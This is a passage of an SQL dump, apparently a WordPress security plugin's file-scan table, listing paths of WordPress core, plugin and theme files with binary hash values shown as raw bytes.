h1ևwI�ʇ��_�v','',0,'?'),('9L>��h9³k��\"','wp-includes/blocks/navigation/view.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\ZL6kV���:�','ĩ��\n0��w�Iy�\"��6B��J_̑a�V','',0,'?'),('9\\4;��J;���u�~�','wp-admin/images/freedom-4.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m�R�%L�$輬','�zThL�S2:�#5�������J��a�[�v�s','',0,'?'),('9fP�=�p�M�v��O','wp-content/plugins/wordfence/js/wfglobal.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jf\'�?g�m:���','X�c\Z]R@���1�qw�)�kl�Q���Q�','',0,'?'),('9k�sB��=}��TŃc7','wp-includes/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('9wv\r���^��!C�','wp-includes/blocks/image/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�\'h����?���!','�7���1����`�V=�&6���_�0��g','',0,'?'),('9|����nRo��Bt[�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bI�M�{6ߧd�Y�','��rم�g�4�E_�\'\'�|a�nnWHM�o؞','',0,'?'),('9��c��O���','wp-content/plugins/redirection/models/url/url-flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g\'st1�+G�g�#��',',k�����Ԥ*r-+�Չ��-���mJ��','',0,'?'),('9�#\'�\nX�����]ʨ','wp-includes/wp-includes/js/jquery/ui/effect-blind.js',0,'����{5���%�ko','����{5���%�ko','��0ʟ\0`rz){쥵3�[��[q[��ٵ','',0,'?'),('9�N�����D�	a','wp-includes/wp-includes/js/crop/marqueeVert.gif',0,'����\0���9��R���','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('9�} B^��?	�\"�','wp-includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5L\"q�8	����','�s`9W:�`s�3���\0CE�U���ڃ�8�','',0,'?'),('9��)�&��{Sd�G','wp-content/plugins/wp-cerber/assets/wp-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�;���C+�r[�\Z�','\r�G�,�NtUVi`��E��}c��iGڄ�E�0','',0,'?'),('9���y�S��	pV6=','wp-includes/blocks/quote/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$B�	e��6��+U<1','k��@��=�WR�Ww���s���u��S�^�D','',0,'?'),('9��k*��$�l�K�=�-','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-cropped-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ӝ��i����n�','�m\Z��Ø~v��\n)&lVE��w\"��Ӂ\\#���','',0,'?'),('9����NL�U ���','wp-content/plugins/wp-fastest-cache/css/fonts/statics/flaticon.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��5fC�h����','��E���9�Оw��0�a1��u	x��r�x�c','',0,'?'),('9����	��ӗ�5�\Z','wp-includes/wp-includes/class-wp-site.php',0,'��eo��C�I�7#�\n��','��eo��C�I�7#�\n��','-�h���ʠ^�F�0?�0\n�%s�ibV\\�X�','',0,'?'),('9� �{b\nJc�F=lY','wp-includes/blocks/query-pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h��(b���K.漄','����iJ��:C8N�ë&(Du��/���J]�','',0,'?'),('9�iQO��=�e_�\Z�G','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�rtaƒ�A�#w��^','��W2��v�e��;��2,�+��\r�>NuT�Ji','',0,'?'),('9�Ce;Y#�v|z��','wp-includes/blocks/audio/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������gPhd��`','�So�L�.@���m��ř���H�&X)����g','',0,'?'),('9�΂�����Q]�8�','wp-content/plugins/wordpress-seo/src/routes/indexables-head-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��a��S\r�-UW#�','x�a��a��l�6�4�_tk%ЮX֨��&�','',0,'?'),('9�\0�7���~���ʾ\0','wp-content/plugins/wp-smushit/app/views/smush-upgrade-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$J�����?|�36I��','*I�s-~5{�	�]I�`��p�8P����','',0,'?'),('9�6���,r�\\1�TC�[','wp-content/plugins/disable-gutenberg/css/font-icons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y9�<�e�kB�4��','{(��6pBi*���ɨϱ��u��l?\"�3I�','',0,'?'),('9ՍҢ��9��d\r�Y','wp-includes/ID3/license.commercial.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n;g��J�g����xA�','�t_2�x�<��-���˜wq�I�g���','',0,'?'),('9��s�3�SZ,p�8g','wp-includes/images/media/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),('9��|��h��$�Ζ�b(','wp-content/plugins/wp-smushit/core/modules/class-backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[{������r��e','<|��I?�%�h����M�%	��&��M�H�UA','',0,'?'),('9�ט�z;�{j�+�','wp-content/plugins/wp-smushit/app/assets/images/dev-team@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�D�1�U�X��','ݶ��dy���[�Si�%�Ϟ��\0a!K�\\�','',0,'?'),(':{���{7�9����','wp-admin/link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �ЭE�J����#','�A&0_:|�=)��DP�Y�\\�p2C\Z�]�]�&�U','',0,'?'),(':�|L�H6(��c�g��','wp-includes/ID3/module.audio.ogg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɇ*�)+��>x��R)�','{Y7n��,�1K�F[LH݆\"��5�;%�!,�','',0,'?'),(':�\r~}�`}I��','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ȝ%�XJYۆ�7��','��w3.�����őF��������W���k�','',0,'?'),(':)VjЄ�_,\"�C �','wp-content/themes/hitmag/inc/kirki/modules/css/property/class-kirki-output-property-font-family.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�?(�d���uQg��V','s�g��H=ɷ�%�BfU��\'��h^ݻo��','',0,'?'),(':1�(�)p]V1�-ȩ�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qDL���a�[	?�$','G�s\0��\r�/1�v=������pS-�yE.��U','',0,'?'),(':7W�{hX��`-��d','wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif',0,' �z!�<�7�����*�',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),(':<�$��0,w\"&e({','wp-includes/class-feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),(':D�J�$�h��Dž\r�','wp-admin/js/customize-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�E߭WuaI�o|k','�R�/gO<��$�������]$�.�[i�','',0,'?'),(':H6Jf�XGs���@�','wp-includes/wp-includes/js/media-audiovideo.js',0,'�ж���t\Z�����','�ж���t\Z�����','s<~d;lL�n�_u+1��jDO����\\�\0��','',0,'?'),(':S�ۦ=���G�B�0�','wp-content/plugins/wordpress-seo/src/exceptions/indexable/term-not-found-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I���<#�7`����','xa���������Bg�K1A�z���VX�','',0,'?'),(':T_��TCMͷ38[��','wp-content/plugins/wp-cerber/assets/flags/tr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�.�e-�es�\'����','����o��6\'<8���\n���kE6~n�l���','',0,'?'),(':���%H`!���\r�Z','wp-admin/js/media-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��g�Usb����K�','�OH+ܽ��g\"���{CvF�B����t1��','',0,'?'),(':�yY\"b���i���','wp-content/plugins/wordpress-seo/src/integrations/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��ݏ����\"M� ','U�&�]提���3�<y\'�,�Í�q�g9�','',0,'?'),(':��s-(B���O�2��)','wp-includes/blocks/cover/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/:�ƿo�Ĉ\\�w','}�bH�+g�q����b�~����','',0,'?'),(':��݊�	֜�<�D��','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-main-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߖ8F�CԋݰK��','`��Ǩ���eR�i�	�]��s���,��i','',0,'?'),(':۪�y�_;��h��\rB','wp-includes/wp-includes/sodium_compat/src/Core32/Util.php',0,'��1�`���0�����','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),(':�M>bB/á=��w\r*}','wp-content/themes/hitmag/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�{�TLGb�� �','�e�����%�T�Gr_bS=��.�����_=','',0,'?'),(':�p����w���\'��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"A+�RMp�@Ա�$GU','�w�+t\r�&ER�a�yo�YIJPx���m�','',0,'?'),(':�)]|t�O�ǔo<�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/AbstractLogger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C޳�Ug\0���_','k�l�7ن0e��,�JvSݸ�j�\\(q�Vo��','',0,'?'),(':�ԇB���R>m�','wp-includes/wp-includes/images/wpicons.png',0,'dS��uq��V_���a�','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),(':�Xqݝ�J\\�5P�4','wp-includes/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),(':�ṇRM�ti#��=','wp-includes/images/media/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),(';#�	n����%\"���','wp-includes/Requests/Exception/HTTP/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��{�yʉ2�l','��-!V��>d�*jP�F�	�;QƵ��N1aG�(','',0,'?'),(';[�j��AQ���X','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/vi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��Ͱ�?�8Ck�G�','�o���2Ϛ�T��n��b{��т��x)א','',0,'?'),(';�ԧ�$=&a���V�','wp-includes/wp-includes/js/zxcvbn-async.min.js',0,'��E��\nO\\��Y�b','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),(';�b�fȖ0����x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�؋J��Tqr?݀b','Xv�G���@UQ��r�@N��G$�=�\Z��','',0,'?'),(';ܒscF��!����','wp-includes/css/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�TAl�&�|6j�����','�Ru���/b�#�����A�\0�H�b1\"���G�t+','',0,'?'),(';;A^G�s�,k,Jf�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/CookieJarInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�(R~ÁZXK�\\','o�Ư3��ԋs���B>�k�t8����I�HF','',0,'?'),(';%�P0C�������','wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections/class-kirki-sections-link-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%/�I�Q!B@��hƗ�','��Mȕ���cG�����\r�`k�5ڶ��E�	','',0,'?'),(';1ы#�Y_N��t�','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\Z�\'�	���:��MhQ','����\0��C�r�� �牺!\\+�N`�8','',0,'?'),(';I�Xa�D�� ޯ퐁�','wp-content/themes/hitmag/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�mur��I1��G�','Lr7D@y���ɂ]NK�(��ti�G9����Tm=','',0,'?'),(';Q}]]U�K}9o����','wp-includes/blocks/post-terms/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��΍=�v�sN~','8ġ�R�p�`e����FMC3�|��E�w�j��','',0,'?'),(';R�yh���RxK�\r','wp-admin/js/farbtastic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�T�2Aq]����4�','�bt�G�p�\0BM0z�XJv�Z�HAt�M�%','',0,'?'),(';n�Cg��7$�;��_','wp-includes/blocks/media-text/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>ڸ�\ZBhR�;�����','���㔻د���n�׳P�嫧��Z��K(�`0','',0,'?'),(';rM�RJ]��7','wp-content/plugins/wordpress-seo/src/helpers/woocommerce-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@������s�7�:�','T�L�5-��S�?�v�9\"J��On�P̥7�%�Ou','',0,'?'),(';��]�nu�7	��Q','wp-content/plugins/wp-smushit/core/modules/class-cdn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��o*�8? ���','H�|���e�9�sX��>0�ȷf��$�','',0,'?'),(';���F�����&���','wp-includes/wp-includes/images/crystal/interactive.png',0,'�R�m`��`�9��','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),(';��,�<��yb��2','wp-includes/wp-includes/images/admin-bar-sprite-2x.png',0,'�Q����8��o��','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),(';���4�[���`�̃','wp-content/plugins/wp-cerber/cerber-lab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[3���\r,Q;�$��','�q�߾�����Q�q����m��ʌ	��_9f�!','',0,'?'),(';�Q�D� *��l_�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/he.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\nz6����j��&','��m*�Md4�Q\\ȅdC8h��g��{_ؖ��[�','',0,'?'),(';�v�0BK����1д','wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),(';�1e�ˍ���0��X\0','wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',0,'����R�<�nI�<','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),(';�d+;�C��?��','wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�2\n���g筴{���','{����u��ǘ�g����L��n}�S��!Nϗ','',0,'?'),(';�2��yT�W�Ks���a','wp-includes/blocks/table/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\06�ba���l�x��','\re\rv{��@l�*fs��/��t}E�p3��1�R','',0,'?'),(';�Wct���*+��Br�','wp-includes/images/smilies/icon_surprised.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),(';����*1\Zn��4�','wp-includes/js/wp-emoji-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q/���*��WN,��','��Yw��x��6F�j7����xi�T�a`�׬6','',0,'?'),(';�?lL�\n	�/�}E','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�\0g�Ό8�$','��1�6Ѽ�Q:Wg��ػ,�S�`n��`i','',0,'?'),('<a����R�]G!\'y��','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/ResponseInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�}ث4�h��C�<�y','i?��c\n�kz��w�mF>���yƄN�\'�:L','',0,'?'),('<�n~�L��M��r�','wp-content/plugins/wordpress-seo/admin/class-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�CJ�гT�]g','�@��W\Z�\n�Me�w���0��LI��zY��{�j�','',0,'?'),('<\Z\r�\Z!�����K`i','wp-content/plugins/wp-cerber/cerber-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C@P�<�Ԓ0���','��F�4�W�xF�-i�<{�(,�_:��','',0,'?'),('< j����lݝ��B��(','wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C@:�p��rˬ(T*�J','\0o�=^�U�Sm���C�\0��W�4]�7','',0,'?'),('<)�2n�7�`Jw���q','wp-content/plugins/redirection/locale/json/redirection-en_NZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_P\Z�}g�x��','��\\��D�&����R�ⵀU=���c��@','',0,'?'),('<BO#���@��y�>��','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules.yml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�y��\r�6�\'G��','!z�J;������WZA-�>�ߋsρDKTأ��','',0,'?'),('<F���Pz�22��~','wp-includes/js/imgareaselect/imgareaselect.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(��()��3���󵕯','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('<YD�-�A�\'�|)���','wp-content/plugins/wordfence/views/user/disabled-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%t�Z)�♟�V�','��G͌�r�A{�\r`\rY���}~h��Jd�','',0,'?'),('<]�L��Ss�Xԗa��','wp-content/plugins/wordpress-seo/js/dist/languages/de.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w\'��\'ջ<^_\nKD','	�~�wJ9�	�P4��.�T`S�\0��q�','',0,'?'),('<a�ґ�z5k��n�','wp-content/plugins/redirection/redirection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8{b T+�^��/��','��\\34�#�֋Ž܅{��I��\\�hWi4u���','',0,'?'),('<o���]���)�	ܡ��','wp-includes/wp-includes/js/wp-util.js',0,'M�J���2$J��+���','M�J���2$J��+���','�u������g⽶����`߆�]�SR,�а�','',0,'?'),('<|q�|xܲ\\��zZ�{','wp-includes/blocks/page-list/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��^�E��D\n6AM�','4�V��1�j�*��ڄ��f!�XP`�W��N','',0,'?'),('<��9�u�j����!�$','wp-admin/css/install.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]Ou�����O','u�?T=f��x $dbk./N��*͎��i���','',0,'?'),('<�&w5�i�B�s��','wp-content/plugins/wordpress-seo/admin/views/tabs/social/facebook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�F�kt���DƂ','�S�4=ƶ�x�PƆ�K�9��@ӑi@\"9�','',0,'?'),('<����u������}��b','wp-includes/wp-includes/class-wp-block-list.php',0,'�.�״�8��9��','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('<��RP���5�`','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/TooManyRedirectsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��¾,���_�Q�,�','|��\"7Z���v��S�.s��fY��|@e��','',0,'?'),('<��e�������5','wp-includes/blocks/block/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���M�� |T\'�Kvy�','U���@&?b��K��R�[,�3��m�.\ZѮb','',0,'?'),('<ޤ�l�K`��i��','wp-includes/blocks/embed/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���K;�n��1C�','��l�|ǒB��������T�3EV�	�uG6i','',0,'?'),('<�hj�	�4���4a�2�','wp-includes/js/utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('<��u꿖\Zܜ��Y�^','wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�<�]�@����	4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('<�l1TmF}m��r��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\AhV�i7�VP��','�|w\nom��6����5!2�K2H�:�V�h','',0,'?'),('<�L�@�ԧ+�2���+','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eÖ��I��\Z��\rM�','Օ�upO�OV��f���%`���i؜���r>','',0,'?'),('=J��ǰja�}LI�Z','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('=	��68A�S#9W���','wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LR=�9���g1vA���','=ࠉV��>�HH����:��VH�','',0,'?'),('= ���Z�ë}`x|[','wp-content/plugins/wordpress-seo/src/schema-templates/preparation-time.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ho�1A�k�����','���d�+\r�UvV�����	��c��&6dG\"','',0,'?'),('=���f;V�dl\"��','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���.��y��^J�i�*','{� ������I��^�`��\0�����<<','',0,'?'),('=	]��}��*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pm�����Q�ynRPqؙ','l�,\\��d.���\"�b�ִ�lz�w�\\�E','',0,'?'),('=��{XH��K���','wp-content/plugins/wordpress-seo/src/services/health-check/ryte-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'6�� n���J`��','&�k��X�[f⁍y�-fI�#�;��;^l�','',0,'?'),('=*��Q[u=�Sd��K','wp-content/plugins/wp-smushit/app/assets/images/chrome-logo@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�:	^2��6y�C.k�','#\r��	��U�^o �ս;ڻ�J��m��<Am{','',0,'?'),('=7���\\��9�&�|','wp-content/plugins/wp-cerber/assets/flags/ky.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x�ѴΙPY%�G','{NG�\n��/9���)���8�����4>s�','',0,'?'),('=H9�Z��\Z�Z��J','wp-includes/wp-includes/js/wp-backbone.js',0,'��J��T	��l�Q��1','��J��T	��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('=S�6�a��Xo�,�2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�V8�\\���Bs','7�h�����>8b�ut^^�Rx�26�#i(�','',0,'?'),('=d1��E��J܉��','wp-includes/wp-includes/js/wp-embed.js',0,'#�N�O8L^�sWkJ�<','#�N�O8L^�sWkJ�<','�� �E��>�@_�0���!�B����5','',0,'?'),('=f�u�A><Th���@','wp-includes/js/jquery/ui/progressbar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4���%�\r�@6P�','uK��;��T��5�-�d�pTS��聃�O�%�','',0,'?'),('=��Сs���zb��','wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css',0,'V̞��/K�x����','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('=��k�[4��� ��=�','wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�0��g�����','�ٚ����$�~?^ѽL���,�S��-�s�T��','',0,'?'),('=�!Pт`�J�ah~i�K','wp-content/plugins/wp-cerber/assets/flags/jp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��P�����\r�U','D�0�r\n��2	n�������Rrܑk�t9�','',0,'?'),('=��Ө��\0E���','wp-includes/blocks/verse/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y&\\��̑[��Z���','����*n�q�V�Nf|��.9wo�wܚ�C','',0,'?'),('=�;�{���e�6�5�','wp-includes/js/jquery/ui/effect-pulsate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$ٸk��2�6?���','�hR�5�3������I��DqP�Q�<仈����','',0,'?'),('=�F�혣�Æ��K&�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�K�o8�E2����','�(�~�S��S\Z�[5E��!n�B�j���D ','',0,'?'),('=噄\nA�K(���l','wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԓ�<����kMy','\nJ�N��&�]R\'\n\'��T�Y��oO$(��[�^','',0,'?'),('=�a������0&','wp-includes/js/jquery/ui/effect-slide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r{D�k��?��\n�j','��V��6\0��-��|�<���u�q_�7�','',0,'?'),('><��s�YW�+J','wp-content/plugins/wp-cerber/assets/flags/mp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�h�D�[��_z�j','~��^4�N\\���˧���h�4N�u���D�m','',0,'?'),('>H��D�AJ^Q{��h','wp-content/plugins/wordpress-seo/js/dist/externals/draftJs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LVe�O��)H&^�c��','�z7#���^9\n�ҟ����h�0�ӝd�Z�','',0,'?'),('>[� g�3d�����','wp-includes/blocks/spacer/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','л�B�����>e���X','-ӡ�n�ڲ�y�qqx-j���!p�B٠)XT4VN[','',0,'?'),('>��Z�I�I|a��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/DroppingStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȷ\"Ou�mr�ͣ��','K�N􉳏�o�k�o�]*�8�|\r5yg`��','',0,'?'),('>\'�8`�\\�ݰ��W�','wp-content/plugins/wordpress-seo/src/routes/alert-dismissal-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�5V��\0��I�C�','A?E��\r��NO$U�t?K&,�lWbԦ��','',0,'?'),('>1�ޅ��pSSh4�','wp-content/plugins/wordfence/js/jquery.colorbox.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O�0%6�9�e�3�j','{�L�#�\r��]�\ngL8P,���@��Ir,{ 